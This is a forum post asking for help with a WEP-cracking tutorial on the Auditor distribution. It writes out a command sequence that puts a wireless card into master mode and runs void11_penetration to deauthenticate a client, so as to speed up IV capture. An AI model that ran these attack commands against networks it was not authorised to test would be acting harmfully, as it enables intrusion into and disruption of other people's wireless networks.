I'm using an Orinoco Gold Card and I'm testing out Auditor on a WEP encrypted networking. Following this tutorial -
http://www.tomsnetworking.com/Sectio...e120-page4.php I have been able to use airodump to capture packets and IVs, but the process is going very slowly (would take a few days to complete) so I'm trying the deauthentication process to speed things up. The commands given from that tutorial are the following:
switch-to-hostap
cardctl eject
cardctl insert
iwconfig wlan0 channel THECHANNELNUM
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
void11_penetration -D -s MACOFSTATION -B MACOFAP wlan0
Since I am using an atheros card, I have had to substitute all "wlan0"s for "ath0"s everything working until the 5th line:
"iwpriv wlan0 hostapd 1"
however I get the error:
"Invalid command: hostpad"
When I do a "man iwpriv" or "iwpriv --help" there is nothing about hostapd being a command. Just wondering if this was a mistake in that tutorial or if I'm doing something wrong. Thanks